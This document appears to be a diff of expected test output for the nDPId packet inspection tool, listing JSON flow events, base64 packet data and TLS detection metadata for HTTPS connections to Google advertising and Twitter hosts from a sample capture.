{"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00970{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2343,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687485,"flow_last_seen":1605291687513,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687513,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.2","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687514,"flow_last_seen":1605291687514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687514,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2344,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1605291687514,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687514,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5MAAAAAoAL9IOSoAAACBAWgBAIICiRA7pIAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2351,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687545,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdleJ0qAcsBIEmLB5kd7IUo3\/YpAbu8cGxxKx0ItjeUoBJXgPGUAAACBAV4AQMDAwQCCArC1z5pJEDukg=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2353,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687545,"pkt":"qtsDr8lk5EKm5WPyht1gD4BTACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXidvHABuwi2N5RscSsegBAB+3WHAAABAQgKJEDuscLXPmk="} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} +00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2355,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687514,"flow_last_seen":1605291687545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687545,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01011{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2356,"source":"reddit.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687485,"flow_last_seen":1605291687552,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605291687552,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::acd9:12c2","src_port":51026,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"securepubads.g.doubleclick.net","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01010{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2382,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01336{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2390,"source":"reddit.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":9,"flow_first_seen":1605291687514,"flow_last_seen":1605291687606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":3661,"flow_avg_l4_payload_len":406,"midstream":0,"thread_ts_msec":1605291687606,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:789d","src_port":48240,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"platform.twitter.com","server_names":"platform.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Twitter, Inc., OU=Twitter Security, CN=platform.twitter.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"2B:30:10:3B:07:2F:F2:EB:3D:08:E3:BB:45:61:F7:A3:9F:4C:A7:92"}} 00616{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687642,"flow_last_seen":1605291687642,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687642,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2460,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1605291687642,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687642,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxgAAAAAoAL9IGTNAAACBAWgBAIICsL4XLwAAAAAAQMDBw=="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2543,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":1605291687676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687676,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgWAAAAAAAAIAgqAcsBIEmLB5kd7IUo3\/YpAbuaYOcfuuGDx7sZoBJXgGbFAAACBAV4AQMDAwQCCArC1z7qwvhcvA=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2544,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":3,"flow_last_seen":1605291687676,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687676,"pkt":"qtsDr8lk5EKm5WPyht1gDI7+ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcIFgAAAAAAACAImmABu4PHuxnnH7rigBAB++qzAAABAQgKwvhc38LXPuo="} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2546,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687642,"flow_last_seen":1605291687678,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687678,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01009{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2554,"source":"reddit.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605291687642,"flow_last_seen":1605291687721,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605291687721,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2008","src_port":39520,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.googletagmanager.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687761,"flow_last_seen":1605291687761,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687761,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2578,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1605291687761,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687761,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bcAAAAAoAL9IFSZAAACBAWgBAIIClvEqOkAAAAAAQMDBw=="} 00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2609,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687790,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGhTs9EqAcsBIEmLB5kd7IUo3\/YpAbuAylJzVUg0Stm4oBJXgFBhAAACBAV4AQMDAwQCCArC1z9gW8So6Q=="} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2610,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":3,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687790,"pkt":"qtsDr8lk5EKm5WPyht1gCTrZACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABoU7PRgMoBuzRK2bhSc1VJgBAB+9RVAAABAQgKW8SpBsLXP2A="} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2611,"source":"reddit.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687761,"flow_last_seen":1605291687790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687790,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::6853:b3d1","src_port":32970,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.aaxdetect.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605291687800,"flow_last_seen":1605291687800,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605291687800,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2616,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1605291687800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687800,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8MAAAAAoAL9IICJAAACBAWgBAIICk1+jVUAAAAAAQMDBw=="} 00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605291687829,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAGj0KsgqAcsBIEmLB5kd7IUo3\/YpAbvdzp1dXkT\/jDfEoBJXgChEAAACBAV4AQMDAwQCCArC1z+HTX6NVQ=="} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":3,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605291687829,"pkt":"qtsDr8lk5EKm5WPyht1gBEqMACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAABo9CrI3c4Bu\/+MN8SdXV5FgBAB+6w4AAABAQgKTX6NcsLXP4c="} -00957{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2647,"source":"reddit.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605291687800,"flow_last_seen":1605291687829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605291687829,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::68f4:2ac8","src_port":56782,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Twitter","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"syndication.twitter.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 